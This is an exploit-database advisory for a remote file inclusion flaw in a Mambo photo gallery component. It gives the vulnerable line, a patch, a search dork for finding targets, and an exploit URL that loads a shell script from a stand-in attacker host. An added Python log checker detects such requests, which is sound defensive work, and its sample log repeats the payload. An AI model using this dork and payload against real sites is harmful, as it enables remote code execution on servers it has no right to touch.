0day Today Exploits Market and 0day Exploits Database

Mambo CopperminePhotoGalery Component Remote Include Vulnerability

Author: k1tk4t
Risk: Security Risk Unsorted
0day-ID: 0day-ID-700
Category: web applications
Date added: 15-08-2006
Platform: unsorted
==================================================================
Mambo CopperminePhotoGalery Component Remote Include Vulnerability
==================================================================



###########  CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia 
 
  This bug allows a remote attacker to execute commands via remote file inclusion (RFI)

file:
cpg.php  

bug:
require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");



patch:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_cpg

expl:
http://www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=http://evil.xxx/shell.txt?
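
A log check for the request pattern this advisory describes, added here as an example (it is not part of the original advisory): it flags requests that set a `mosConfig_*` variable from the query string, and requests that reach `cpg.php` directly instead of through `index.php`. The log lines are constructed, and the function names and verdict labels are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (placeholder IPs); the URLs reuse the advisory's own example.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Aug/2006:10:00:01 +0000] "GET /index.php?option=com_cpg&Itemid=5 HTTP/1.1" 200 5120
192.0.2.77 - - [15/Aug/2006:10:02:13 +0000] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://evil.xxx/shell.txt? HTTP/1.1" 200 312
192.0.2.77 - - [15/Aug/2006:10:02:40 +0000] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http%3A%2F%2Fevil.xxx%2Fshell.txt%3F HTTP/1.1" 200 312
192.0.2.31 - - [15/Aug/2006:10:05:00 +0000] "GET /components/com_cpg/cpg.php HTTP/1.1" 200 15
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*:", re.I)  # http:, https:, ftp:, php:, data:
COMPONENT_FILE = "/components/com_cpg/cpg.php"          # file named in the advisory
CONFIG_PREFIX = "mosConfig_"                            # config variables set by Mambo itself


def classify(target):
    """Return a verdict label for one request target, or None if it looks normal."""
    parts = urlsplit(target)
    # parse_qs percent-decodes names and values, so encoded values are seen in clear.
    params = parse_qs(parts.query, keep_blank_values=True)
    overrides = [v for k, vals in params.items() if k.startswith(CONFIG_PREFIX) for v in vals]
    if any(SCHEME.match(v) for v in overrides):
        return "remote-include"    # config path points at a URL or stream wrapper
    if overrides:
        return "config-override"   # client tried to set a config variable at all
    if parts.path.endswith(COMPONENT_FILE):
        return "direct-access"     # bypasses index.php, which the _VALID_MOS guard blocks
    return None


def scan(log_text):
    """Return (client_ip, verdict) per flagged line; only the query string is inspected."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        verdict = classify(m.group("target")) if m else None
        if verdict:
            findings.append((m.group("ip"), verdict))
    return findings


if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

POST bodies do not appear in access logs, so a request that carries the same parameter in its body shows up here only as `direct-access`.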





#  0day.today [2024-12-24]  #